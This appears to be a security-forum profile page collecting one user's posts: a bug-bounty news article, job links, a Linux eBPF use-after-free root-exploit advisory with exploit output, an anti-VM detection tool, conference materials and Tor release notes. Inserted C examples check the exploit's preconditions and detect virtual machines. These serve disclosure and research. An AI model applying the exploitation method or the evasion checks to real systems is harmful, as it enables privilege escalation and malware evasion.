Nytro

Everything posted by Nytro

  1. The Romanian Teen Hacker Who Hunts Bugs to Resist the Dark Side

     IT'S 3 AM, and his eyes are almost closed. The pack of gummy bears on his desk is empty. So's the Chinese takeout box. Romanian white hat hacker Alex Coltuneac has had three hours of sleep tonight. And last night. And the night before that. He's busy trying to find a vulnerability in YouTube live chat, which he plans to report to the company and hopefully get some money in return. None of the bugs he has discovered in the past few days electrifies him, so he keeps digging.

     In the past four years, Coltuneac has gotten bug bounty payments from Google, Facebook, Microsoft, Adobe, Yahoo, eBay, and PayPal for flaws he reported. Such bounty programs are a chance for Eastern European hackers like him to pursue a legitimate career in cybersecurity. And he's only 19 years old.

     In a country better known for cybercrime, the teenager is part of a small but growing cohort of hackers who are deciding to play it nice. This is a departure for the hacking community of Romania, known for such hits as the hackers Hackerville and Guccifer, and fraudsters who steal money from American bank accounts, perpetrate eBay frauds, and land themselves on the FBI's most wanted list.

     Coltuneac is a freshman at the Babes-Bolyai University in Cluj-Napoca, where he learns Computer Science taught in English. Raised by a family who emphasized honest values, he started using a computer when he was 6. First, he taught himself how to play games, but as he got older he began to see the computer's potential as a tool to make money. He spent his early teenage years watching fellow Romanian hackers make astounding sums of money selling exploits on the black market. They were able to rake in thousands of US dollars with just a few clicks, far more than Coltuneac's parents made in a month. He was a good kid, from a good family. He didn't want to join them. But he did want to pay for college. The allure of that life was powerful.

     Which is why he was so grateful to find out about bug bounty programs when he was 15. They pay enough to keep his conscience clear and his bank account full. Bounties cover the cost of his education and living expenses, so "there's no excuse to break the law," he said.

     Coltuneac won't say how much he earns as a vulnerability hunter, yet gifted white hat hackers doing the same kind of job brag about making about $6,000 in a lucky month. That's how much an ordinary Romanian earns in a year. The average take-home pay in the country was about $520 a month this March, one of the lowest in the European Union.

     On the white market, a flaw found and reported legitimately is priced at a few hundred dollars, enough for Coltuneac to pay his rent this month. Sensitive ones are often rewarded with several thousand dollars. In very few cases, the bounty exceeds $100,000. He's constantly hoping to find one of those. And that sum is still far less than what he would get if he sold the same vulnerabilities on the gray or black markets. (Gray markets sell exploits to nations and corporations to use against their foes; black markets sell to the highest bidder, often criminals.) Zerodium, a gray hat vulnerability broker working with law enforcement and intelligence agencies, awards a hacker up to $500,000 for a high-risk bug with a fully functional exploit.

     Patching Giants

     Coltuneac started hunting vulnerabilities when he was 15, after visiting a Romanian cybersecurity forum, in his free time after school. Like most Romanian hackers, the teen is self-taught. Soon, he got his first few hundred dollars from Google, and used them to buy himself a brand new computer. His desktop was dead slow. "I got lucky. I found a sensitive file. I used brute force," he said. The tech giant is among the companies he closely monitors for bug bounty programs. He has recently found an LFI vulnerability and several XSS flaws in Google FeedBurner.

     Last year alone, Google awarded over $2 million to security researchers globally, and since 2010, when it began its bug bounty program, it has paid a total of $6 million. For 2015, Google highlighted Romania as among the top countries bug bounties were paid out to.

     Coltuneac has also made it to Microsoft's Bounty Hunters: The Honor Roll. This spring he found an XSS vuln in their OAuth interface. Microsoft is constantly improving its bounty program, and last year, the company included rewards for flaws found in Azure, ASP.NET, .NET Core runtime and the Edge browser.

     Full article: https://www.wired.com/2016/05/romanian-teen-hacker-hunts-bugs-resist-dark-side/
  2. Jobs available at the start of summer:

     SecureWorks jobs: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/search/4894363
       • Penetration Tester - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/penetration-tester-87625
       • Technical Testing Tools Developer - Ruby on Rails & JavaScript - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/technical-testing-tools-developer-ruby-javascript-88418
       • Vulnerability Specialist - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/vulnerability-specialist-85444
       • Solutions Architect Consultant - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/solutions-architect-consultant-secureworks-bucharest-89440
       • Linux System Administrator - SecureWorks: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/linux-system-administrator-secureworks-89426
       • Junior Linux Administrator - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/junior-linux-administrator-secureworks-bucharest-89427
       • Information Security Specialist - Rotating Shifts - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/information-security-senior-analyst-rotating-shifts-86359
       • Local IT Support - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/deskside-technician-85137
       • Network Engineering Specialist - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/network-engineering-specialist-85077
       • Network Engineer - Telecom - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/network-engineer-telecom-85891
       • Information Security Risk Management Advisor - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/information-security-risk-management-advisor-secureworks-bucharest-89300
       • SharePoint Designer - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/sharepoint-designer-secureworks-bucharest-89716

     Dell jobs:
       • Technical Support Agent - English: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/technical-support-agent-english-86798
       • Critical Incident Consultant: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/critical-incident-consultant-88525
       • Windows System Administrator: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/windows-system-administrator-86347
       • Information Security Team Leader: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/information-security-team-leader-86413
       • Network Security Engineer - Firewall: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/network-security-engineer-firewall-87655
       • Senior IT Manager: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/senior-it-manager-86956
       • Vulnerability Consultant: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/vulnerability-consultant-88299

     If you have questions, send me a PM.
  3. Linux Kernel 4.4.x (Ubuntu 16.04) - Use-After-Free Local Root Exploit

     In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime, unprivileged code can use the bpf() syscall to load eBPF socket filter programs. These conditions are fulfilled in Ubuntu 16.04.

     When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first function that touches the supplied eBPF instructions is replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF map file descriptors and looks up pointers for the corresponding map files. This is done as follows:

         /* look for pseudo eBPF instructions that access map FDs and
          * replace them with actual map pointers */
         static int replace_map_fd_with_map_ptr(struct verifier_env *env)
         {
         	struct bpf_insn *insn = env->prog->insnsi;
         	int insn_cnt = env->prog->len;
         	int i, j;

         	for (i = 0; i < insn_cnt; i++, insn++) {
         		[checks for bad instructions]
         		if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) {
         			struct bpf_map *map;
         			struct fd f;

         			[checks for bad instructions]
         			f = fdget(insn->imm);
         			map = __bpf_map_get(f);
         			if (IS_ERR(map)) {
         				verbose("fd %d is not pointing to valid bpf_map\n",
         					insn->imm);
         				fdput(f);
         				return PTR_ERR(map);
         			}
         			[...]
         		}
         	}
         	[...]
         }

     __bpf_map_get contains the following code:

         /* if error is returned, fd is released.
          * On success caller should complete fd access with matching fdput()
          */
         struct bpf_map *__bpf_map_get(struct fd f)
         {
         	if (!f.file)
         		return ERR_PTR(-EBADF);
         	if (f.file->f_op != &bpf_map_fops) {
         		fdput(f);
         		return ERR_PTR(-EINVAL);
         	}

         	return f.file->private_data;
         }

     The problem is that when the caller supplies a file descriptor number referring to a struct file that is not an eBPF map, both __bpf_map_get() and replace_map_fd_with_map_ptr() will call fdput() on the struct fd. If __fget_light() detected that the file descriptor table is shared with another task and therefore the FDPUT_FPUT flag is set in the struct fd, this will cause the reference count of the struct file to be over-decremented, allowing an attacker to create a use-after-free situation where a struct file is freed although there are still references to it.

     A simple proof of concept that causes oopses/crashes on a kernel compiled with memory debugging options is attached as crasher.tar.

     One way to exploit this issue is to create a writable file descriptor, start a write operation on it, wait for the kernel to verify the file's writability, then free the writable file and open a readonly file that is allocated in the same place before the kernel writes into the freed file, allowing an attacker to write data to a readonly file. By e.g. writing to /etc/crontab, root privileges can then be obtained. There are two problems with this approach:

       • The attacker should ideally be able to determine whether a newly allocated struct file is located at the same address as the previously freed one. Linux provides a syscall that performs exactly this comparison for the caller: kcmp(getpid(), getpid(), KCMP_FILE, uaf_fd, new_fd).
       • In order to make exploitation more reliable, the attacker should be able to pause code execution in the kernel between the writability check of the target file and the actual write operation. This can be done by abusing the writev() syscall and FUSE: the attacker mounts a FUSE filesystem that artificially delays read accesses, then mmap()s a file containing a struct iovec from that FUSE filesystem and passes the result of mmap() to writev(). (Another way to do this would be to use the userfaultfd() syscall.)

     writev() calls do_writev(), which looks up the struct file * corresponding to the file descriptor number and then calls vfs_writev(). vfs_writev() verifies that the target file is writable, then calls do_readv_writev(), which first copies the struct iovec from userspace using import_iovec(), then performs the rest of the write operation. Because import_iovec() performs a userspace memory access, it may have to wait for pages to be faulted in - and in this case, it has to wait for the attacker-owned FUSE filesystem to resolve the pagefault, allowing the attacker to suspend code execution in the kernel at that point arbitrarily.

     An exploit that puts all this together is in exploit.tar. Usage:

         user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
         user@host:~/ebpf_mapfd_doubleput$ ./doubleput
         starting writev
         woohoo, got pointer reuse
         writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
         suid file detected, launching rootshell...
         we have root privs now...
         root@host:~/ebpf_mapfd_doubleput# id
         uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)

     This exploit was tested on a Ubuntu 16.04 Desktop system.

     Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7
     Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
     Source: https://cxsecurity.com/issue/WLB-2016050014
      • 2
      • Upvote
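Two things a practitioner wants from the advisory above before touching the exploit: a check of the preconditions it names (kernel >= 4.4 and kernel.unprivileged_bpf_disabled never set to 1) on the host at hand, and a look at the kcmp(2) comparison it relies on to tell whether a fresh fd landed on the freed struct file. The program below is an added example, not the Project Zero advisory's code or the exploit from exploit.tar. The sysfs/procfs path, the "reachable" rule (sysctl present with value 0; a missing sysctl is treated as bpf() not compiled in) and the dup()/open() demonstration are this example's own assumptions.

```c
/* Added example, not from the advisory or exploit.tar: precondition check for
 * the unprivileged bpf() path, plus the kcmp(2) struct-file comparison. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/utsname.h>
#include <unistd.h>

#ifndef KCMP_FILE
#define KCMP_FILE 0 /* value from <linux/kcmp.h>, repeated so this builds without it */
#endif

/* Assumed location of the sysctl; only present with CONFIG_BPF_SYSCALL. */
#define BPF_SYSCTL "/proc/sys/kernel/unprivileged_bpf_disabled"

/* 1 if a release string such as "4.4.0-21-generic" is >= maj.min, else 0. */
int version_at_least(const char *release, int maj, int min)
{
    int rmaj = 0, rmin = 0;
    if (sscanf(release, "%d.%d", &rmaj, &rmin) != 2)
        return 0;
    return rmaj > maj || (rmaj == maj && rmin >= min);
}

/* Integer value of the sysctl file, or -1 if it cannot be read. */
int read_unprivileged_bpf_disabled(const char *path)
{
    int v = -1;
    FILE *f = fopen(path, "r");
    if (!f)
        return -1;
    if (fscanf(f, "%d", &v) != 1)
        v = -1;
    fclose(f);
    return v;
}

/* Assumed rule from the advisory's wording: unprivileged code reaches bpf()
 * when the kernel is >= 4.4 and the sysctl exists and is 0 (never set to 1). */
int unprivileged_bpf_reachable(const char *release, int sysctl_value)
{
    return version_at_least(release, 4, 4) && sysctl_value == 0;
}

/* kcmp(2) on two fds of the calling process, as the advisory uses it:
 * 0 = same struct file, 1 = different struct files,
 * -1 = kcmp unavailable here (ENOSYS, EPERM, seccomp, non-Linux build). */
int same_struct_file(int fd_a, int fd_b)
{
#ifdef SYS_kcmp
    pid_t me = getpid();
    long r = syscall(SYS_kcmp, me, me, KCMP_FILE, fd_a, fd_b);
    if (r < 0)
        return -1;
    return r == 0 ? 0 : 1;
#else
    (void)fd_a; (void)fd_b;
    return -1;
#endif
}

int main(void)
{
    struct utsname u;
    uname(&u);
    int sysctl_value = read_unprivileged_bpf_disabled(BPF_SYSCTL);
    printf("kernel %s, unprivileged_bpf_disabled=%d -> unprivileged bpf() reachable: %s\n",
           u.release, sysctl_value,
           unprivileged_bpf_reachable(u.release, sysctl_value) ? "yes" : "no");

    /* dup() shares one struct file; a second open() allocates a new one. This is
     * the distinction the exploit needs kcmp() to make after the UAF. */
    int a = open("/dev/null", O_RDONLY);
    int b = dup(a);
    int c = open("/dev/null", O_RDONLY);
    printf("kcmp(a, dup(a)) = %d, kcmp(a, second open()) = %d\n",
           same_struct_file(a, b), same_struct_file(a, c));
    close(a); close(b); close(c);
    return 0;
}
```

Build with `gcc -Wall -o bpfcheck bpfcheck.c` and run unprivileged; a -1 from same_struct_file() on a container host usually means kcmp is filtered by seccomp rather than absent from the kernel.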
  4. Android-Security-Reference

     This is a reference guide for all things Android Security. I'm slowly moving my private notes over to this repo as:
       • it may help others
       • others may help me (by correcting / adding to the ref)

     Feel free to contribute!

     Tools
       • Nav helper: OctoTree
       • TOC gen: DocToc

     Source: https://github.com/doridori/Android-Security-Reference
      • 1
      • Upvote
  5. Anti-Sandbox and Anti-Virtual Machine Tool

     (Turkish: https://github.com/AlicanAkyol/sems/blob/master/Readme_Turkish.md)
     (SHA1 (sems.exe): 06598E9948C2E256C871E66B5578D51A1886758F)

     Modern malware is equipped with anti-analysis techniques in order to evade analysis. It is common for malware to check at runtime for the presence of a virtualization environment, a malware analysis sandbox or analysis tools. sems is a tool created to help malware researchers by checking their environments for the signatures of virtualization techniques, malware sandbox tools and well-known malware analysis tools. sems uses the same techniques and looks for the same footprints that evasive malware does in order to detect whether it is running in a controlled environment, so it is useful for malware researchers to check whether their analysis environment can be detected and evaded.

     How it works?

     Virtual Machine
     Once the tool is run in a virtual machine (VirtualBox, VMware, QEMU), it performs all the checks shown below and writes log lines to the console about detected signatures until the "control" text is shown. In addition, a separate .txt file named after the finding is created in the working directory for each detected signature. Example: vboxBios.txt will be created for the VirtualBox BIOS signature.

     Malware Sandbox
     sems is submitted to a malware sandbox like any other malware sample, and you wait until the analysis completes. Detected signatures can then be seen in the "File Operations" section of the sandbox report, since sems drops a separate .txt file for each finding.

     Source: https://github.com/AlicanAkyol/sems
      • 1
      • Upvote
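To make the "same footprints that evasive malware looks for" concrete, here is an added example of the kind of check sems performs, reduced to two of the classic ones: the CPUID "hypervisor present" bit and substring matches on SMBIOS/DMI vendor and product strings, with a marker file dropped per finding the way sems does. This is not the sems source (sems is a Windows binary); the signature table, finding names, sysfs paths and the sample strings are this example's own assumptions.

```c
/* Added example, not the sems source: CPUID hypervisor bit plus DMI string
 * signatures, one marker file per finding. Signatures and paths are assumptions. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#if defined(__x86_64__) || defined(__i386__)
#include <cpuid.h>
#endif

struct dmi_sig { const char *needle; const char *finding; };

/* Substrings the common hypervisors leave in SMBIOS vendor/product fields.
 * Finding names follow the sems convention (e.g. vboxBios.txt). */
static const struct dmi_sig dmi_sigs[] = {
    { "innotek",    "vboxBios" },
    { "virtualbox", "vboxProduct" },
    { "vmware",     "vmwareBios" },
    { "qemu",       "qemuBios" },
    { "bochs",      "qemuBios" },
    { NULL, NULL }
};

/* Case-insensitive substring test (strcasestr is not portable C). */
static int contains_ci(const char *hay, const char *needle)
{
    size_t n = strlen(needle);
    for (; *hay; hay++) {
        size_t i = 0;
        while (i < n && hay[i] &&
               tolower((unsigned char)hay[i]) == tolower((unsigned char)needle[i]))
            i++;
        if (i == n)
            return 1;
    }
    return 0;
}

/* Finding name for one DMI/BIOS string, or NULL when it matches no signature. */
const char *classify_dmi_string(const char *s)
{
    for (const struct dmi_sig *sig = dmi_sigs; sig->needle; sig++)
        if (contains_ci(s, sig->needle))
            return sig->finding;
    return NULL;
}

/* CPUID leaf 1, ECX bit 31 ("hypervisor present"): 1 set, 0 clear, -1 not x86. */
int cpuid_hypervisor_bit(void)
{
#if defined(__x86_64__) || defined(__i386__)
    unsigned int eax, ebx, ecx, edx;
    if (!__get_cpuid(1, &eax, &ebx, &ecx, &edx))
        return -1;
    return (ecx >> 31) & 1;
#else
    return -1;
#endif
}

/* Runs the signatures over n strings; with a non-NULL marker_dir, drops
 * "<marker_dir>/<finding>.txt" per hit, like sems. Returns the hit count. */
int scan_dmi_strings(const char *const *strings, int n, const char *marker_dir)
{
    int hits = 0;
    for (int i = 0; i < n; i++) {
        const char *finding = classify_dmi_string(strings[i]);
        if (!finding)
            continue;
        hits++;
        printf("detected: %s (from \"%s\")\n", finding, strings[i]);
        if (marker_dir) {
            char path[512];
            snprintf(path, sizeof path, "%s/%s.txt", marker_dir, finding);
            FILE *f = fopen(path, "w");
            if (f) { fputs(strings[i], f); fclose(f); }
        }
    }
    return hits;
}

/* Reads one sysfs DMI field (Linux) into buf; returns 0 if unavailable. */
int read_dmi_field(const char *path, char *buf, size_t len)
{
    FILE *f = fopen(path, "r");
    if (!f) return 0;
    if (!fgets(buf, (int)len, f)) { fclose(f); return 0; }
    fclose(f);
    buf[strcspn(buf, "\n")] = '\0';
    return 1;
}

int main(void)
{
    /* Constructed sample strings standing in for what a VirtualBox guest reports. */
    const char *const sample[] = { "innotek GmbH", "VirtualBox", "Dell Inc.", "Latitude 7490" };
    printf("hypervisor bit: %d\n", cpuid_hypervisor_bit());
    printf("sample strings: %d findings\n", scan_dmi_strings(sample, 4, NULL));

    char vendor[256], product[256];
    int got = read_dmi_field("/sys/class/dmi/id/sys_vendor", vendor, sizeof vendor)
            + read_dmi_field("/sys/class/dmi/id/product_name", product, sizeof product);
    if (got == 2) {
        const char *const live[] = { vendor, product };
        printf("this host: %d findings\n", scan_dmi_strings(live, 2, NULL));
    }
    return 0;
}
```

Run it inside the analysis VM and in the sandbox: any finding here is a string a sample could match just as easily, which is the point sems makes. A bare-metal host with a hypervisor bit of 0 and no DMI matches passes these two checks only; sems covers many more.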
  6. Link: https://conference.hitb.org/hitbsecconf2016ams/materials/

     Name | Last modified | Size
       • CLOSING KEYNOTE - Sophia D Antoine - Hardware Side Channels in Virtualized Environments.pdf | 2016-05-27 18:40 | 2.3M
       • D1 COMMSEC - Elisabeth de Leeuw - Unformation in the Era of Hyper Connectivity.pdf | 2016-05-26 18:03 | 2.5M
       • D1 COMMSEC - Marc Newlin - Applying Regulatory Data to IoT RF Reverse Engineering.pdf | 2016-05-26 15:59 | 5.7M
       • D1 COMMSEC - Martin Knobloch - Don't Feed the Hippos.pdf | 2016-05-26 16:00 | 18M
       • D1 COMMSEC - Melanie Rieback - Pentesting ChatOps.pdf | 2016-05-30 10:06 | 3.4M
       • D1 COMMSEC - Nadav Markus and Gal De Leon - Exploiting GLIBC - Hacking Everything.pdf | 2016-05-26 18:18 | 1.0M
       • D1T1 - Jacob Torrey - Using the Observer Effect and Cyber Fengshui.pdf | 2016-05-26 15:37 | 4.9M
       • D1T1 - Lin Huang - Forcing a Targeted LTE Cellphone into an Eavesdropping Network.pdf | 2016-05-26 18:00 | 1.7M
       • D1T1 - Nick Biasini - Exploit Kits - Hunting the Hunters .pdf | 2016-05-26 17:05 | 45M
       • D1T1 - Radu Caragea - Peering into the Depths of TLS Traffic in Real Time.pdf | 2016-05-26 15:09 | 1.1M
       • D1T1 - Shengping Wang and Xu Liu - Escape From The Docker-KVM-QEMU Machine.pdf | 2016-05-26 12:16 | 2.0M
       • D1T1 - Tang Qing Hao - Virtualization System Vulnerability Discovery Framework.pdf | 2016-05-26 11:50 | 1.0M
       • D1T2 - Broderick Aquilino and Wayne Low - Kernel Exploit Hunting and Mitigation.pdf | 2016-05-26 15:10 | 1.4M
       • D1T2 - Chilik Tamir - Profiting from iOS Malware.pdf | 2016-05-26 15:37 | 27M
       • D1T2 - Michele Spagnuolo and Lukas Weichselbaum - CSP Oddities.pdf | 2016-05-26 12:31 | 1.6M
       • D1T2 - Seunghun Han - Create Your Own Bad USB Device.pdf | 2016-05-26 17:00 | 3.5M
       • D1T2 - Tim Xia - Adaptive Android Kernel Live Patching.pdf | 2016-05-26 18:20 | 2.4M
       • D1T2 - Yann Allain and Julien Moinard - Hardsploit Project.pdf | 2016-05-26 11:50 | 8.5M
       • D1T3 - Gustavo Grieco - Vulnerability Discovery Using Machine Learning.pdf | 2016-05-27 07:18 | 1.1M
       • D1T3 LABS - Anto Joseph - Droid-FF.pdf | 2016-05-26 12:31 | 30M
       • D1T3 LABS - Tony Trummer and Tushar Dalvi - Mobile Application Security for iOS and Android.zip | 2016-05-26 18:29 | 4.9M
       • D2 COMMSEC - Antonio Martins - Inspecage - Android Pacakge Inspector.zip | 2016-05-30 18:30 | 19M
       • D2 COMMSEC - Barry van Kampen - Hack in The Class.pdf | 2016-05-30 18:28 | 520K
       • D2 COMMSEC - Mattijs van Ommeren - A Series Of Unfortunate Events - Where Malware Meets Murphy.pdf | 2016-05-27 12:24 | 71M
       • D2 COMMSEC - Paul Marinescu - Facebook Presents Capture the Flag.pdf | 2016-05-30 10:17 | 6.3M
       • D2T1 - Anders Fogh - Cache Side Channel Attacks.pdf | 2016-05-27 13:52 | 432K
       • D2T1 - Felix Wilhelm - Attacking Next Generation Firewalls.pdf | 2016-05-27 15:59 | 2.9M
       • D2T1 - Jun Li - CANSsee - An Automobile Intrusion Detection System.pdf | 2016-05-27 18:39 | 5.5M
       • D2T1 - Yuwei Zheng and Haoqi Shan - Forging a Wireless Time Signal to Attack NTP Servers.pdf | 2016-05-27 12:26 | 6.9M
       • D2T1 Itzik Kotler and Amit Klein - The Perfect Exfiltration Technique.pdf | 2016-05-27 15:07 | 2.6M
       • D2T2 - Mikhail Egorov and Sergey Soldatov - New Methods for Exploiting ORM Injections in Java Applications.pdf | 2016-05-27 12:46 | 1.7M
       • D2T2 - Peter blasty Geissler - Breaking Naive ESSID WPA2 Key Generation Algorithms.pdf | 2016-05-27 18:39 | 8.4M
       • D2T2 - Richard Johnson - Go Speed Tracer - Guided Fuzzing.pdf | 2016-05-27 12:39 | 4.4M
       • D2T2 - Shangcong Luan - Xen Hypervisor VM Escape.pdf | 2016-05-27 15:37 | 1.9M
       • D2T2 - Wish Wu - Perf - From Profiling to Kernel Exploiting.pdf | 2016-05-27 15:06 | 315K
       • D2T3 LABS - Matteo Beccaro - Electronic Access Control Security.pdf | 2016-05-27 16:11 | 13M
       • KEYNOTE 1 - John Adams - Beyond FBI v Apple.pdf | 2016-05-26 09:40 | 6.4M
       • KEYNOTE 2 - Adam Laurie - The Future Has Arrived and it's Effin Hilarious.odp | 2016-05-27 10:47 | 281M
       • Whitepapers/ | 2016-05-27 18:40 | -

     Congratulations to Radu Caragea @ Bitdefender - https://conference.hitb.org/hitbsecconf2016ams/materials/D1T1 - Radu Caragea - Peering into the Depths of TLS Traffic in Real Time.pdf
      • 1
      • Upvote
  7. Tor Browser 6.0 is released
     Posted May 30th, 2016 by gk

     The Tor Browser Team is proud to announce the first stable release in the 6.0 series. This release is available from the Tor Browser Project page and also from our distribution directory.

     This release brings us up to date with Firefox 45-ESR, which should mean better support for HTML5 video on YouTube, as well as a host of other improvements.

     Beginning with the 6.0 series, code signing for OS X systems is introduced. This should help our users who had trouble getting Tor Browser to work on their Mac due to Gatekeeper interference. There were bundle layout changes necessary to adhere to code signing requirements, but the transition to the new Tor Browser layout on disk should go smoothly.

     The release also features new privacy enhancements and disables features where we either did not have the time to write a proper fix or where we decided they are potentially harmful in a Tor Browser context.

     On the security side this release makes sure that SHA1 certificate support is disabled and that our updater is not relying on the signature alone but is checking the hash of the downloaded update file as well before applying it. Moreover, we provide a fix for a Windows installer related DLL hijacking vulnerability.

     A note on our search engine situation: Lately, we got a couple of comments on our blog and via email wondering why we are now using DuckDuckGo as the default search engine and not Disconnect anymore. Well, we still use Disconnect. But for a while now Disconnect has had no access to the Google search results which we used in Tor Browser. Disconnect, being more of a meta search engine which allows users to choose between different search providers, fell back to delivering Bing search results, which were basically unacceptable quality-wise. While Disconnect is still trying to fix the situation, we asked them to change the fallback to DuckDuckGo, as their search results are strictly better than the ones Bing delivers.

     The full changelog since Tor Browser 5.5.5 is:

     Tor Browser 6.0 -- May 30

     All Platforms
       • Update Firefox to 45.1.1esr
       • Update OpenSSL to 1.0.1t
       • Update Torbutton to 1.9.5.4
           • Bug 18466: Make Torbutton compatible with Firefox ESR 45
           • Bug 18743: Pref to hide 'Sign in to Sync' button in hamburger menu
           • Bug 18905: Hide unusable items from help menu
           • Bug 16017: Allow users to more easily set a non-tor SSH proxy
           • Bug 17599: Provide shortcuts for New Identity and New Circuit
           • Translation updates
           • Code clean-up
       • Update Tor Launcher to 0.2.9.3
           • Bug 13252: Do not store data in the application bundle
           • Bug 18947: Tor Browser is not starting on OS X if put into /Applications
           • Bug 11773: Setup wizard UI flow improvements
           • Translation updates
       • Update HTTPS-Everywhere to 5.1.9
       • Update meek to 0.22 (tag 0.22-18371-3)
           • Bug 18371: Symlinks are incompatible with Gatekeeper signing
           • Bug 18904: Mac OS: meek-http-helper profile not updated
       • Bug 15197 and child tickets: Rebase Tor Browser patches to ESR 45
       • Bug 18900: Fix broken updater on Linux
       • Bug 19121: The update.xml hash should get checked during update
       • Bug 18042: Disable SHA1 certificate support
       • Bug 18821: Disable libmdns support for desktop and mobile
       • Bug 18848: Disable additional welcome URL shown on first start
       • Bug 14970: Exempt our extensions from signing requirement
       • Bug 16328: Disable MediaDevices.enumerateDevices
       • Bug 16673: Disable HTTP Alternative-Services
       • Bug 17167: Disable Mozilla's tracking protection
       • Bug 18603: Disable performance-based WebGL fingerprinting option
       • Bug 18738: Disable Selfsupport and Unified Telemetry
       • Bug 18799: Disable Network Tickler
       • Bug 18800: Remove DNS lookup in lockfile code
       • Bug 18801: Disable dom.push preferences
       • Bug 18802: Remove the JS-based Flash VM (Shumway)
       • Bug 18863: Disable MozTCPSocket explicitly
       • Bug 15640: Place Canvas MediaStream behind site permission
       • Bug 16326: Verify cache isolation for Request and Fetch APIs
       • Bug 18741: Fix OCSP and favicon isolation for ESR 45
       • Bug 16998: Disable <link rel="preconnect"> for now
       • Bug 18898: Exempt the meek extension from the signing requirement as well
       • Bug 18899: Don't copy Torbutton, TorLauncher, etc. into meek profile
       • Bug 18890: Test importScripts() for cache and network isolation
       • Bug 18886: Hide pocket menu items when Pocket is disabled
       • Bug 18703: Fix circuit isolation issues on Page Info dialog
       • Bug 19115: Tor Browser should not fall back to Bing as its search engine
       • Bug 18915+19065: Use our search plugins in localized builds
       • Bug 19176: Zip our language packs deterministically
       • Bug 18811: Fix first-party isolation for blobs URLs in Workers
       • Bug 18950: Disable or audit Reader View
       • Bug 18886: Remove Pocket
       • Bug 18619: Tor Browser reports "InvalidStateError" in browser console
       • Bug 18945: Disable monitoring the connected state of Tor Browser users
       • Bug 18855: Don't show error after add-on directory clean-up
       • Bug 18885: Disable the option of logging TLS/SSL key material
       • Bug 18770: SVGs should not show up on Page Info dialog when disabled
       • Bug 18958: Spoof screen.orientation values
       • Bug 19047: Disable Heartbeat prompts
       • Bug 18914: Use English-only label in <isindex/> tags
       • Bug 18996: Investigate server logging in esr45-based Tor Browser
       • Bug 17790: Add unit tests for keyboard fingerprinting defenses
       • Bug 18995: Regression test to ensure CacheStorage is disabled
       • Bug 18912: Add automated tests for updater cert pinning
       • Bug 16728: Add test cases for favicon isolation
       • Bug 18976: Remove some FTE bridges

     Windows
       • Bug 13419: Support ICU in Windows builds
       • Bug 16874: Fix broken https://sports.yahoo.com/dailyfantasy page
       • Bug 18767: Context menu is broken on Windows in ESR 45 based Tor Browser

     OS X
       • Bug 6540: Support OS X Gatekeeper
       • Bug 13252: Tor Browser should not store data in the application bundle
       • Bug 18951: HTTPS-E is missing after update
       • Bug 18904: meek-http-helper profile not updated
       • Bug 18928: Upgrade is not smooth (requires another restart)

     Build System

     All Platforms
       • Bug 18127: Add LXC support for building with Debian guest VMs
       • Bug 16224: Don't use BUILD_HOSTNAME anymore in Firefox builds
       • Bug 18919: Remove unused keys and unused dependencies

     Windows
       • Bug 17895: Use NSIS 2.51 for installer to avoid DLL hijacking
       • Bug 18290: Bump mingw-w64 commit we use

     OS X
       • Bug 18331: Update toolchain for Firefox 45 ESR
       • Bug 18690: Switch to Debian Wheezy guest VMs

     Linux
       • Bug 18699: Stripping fails due to obsolete Browser/components directory
       • Bug 18698: Include libgconf2-dev for our Linux builds
       • Bug 15578: Switch to Debian Wheezy guest VMs (10.04 LTS is EOL)

     Source: https://blog.torproject.org/blog/tor-browser-60-released
  8. It depends on experience. It's the same as in programming.
  9. Pentesting with one hand on the mouse and the other in your pants.
  10. Hi,

      I received another email with a JS inside a ZIP. It's stupid: it starts with comments, has the code somewhere in the middle and ends with comments. Anyway, the JS is the following:

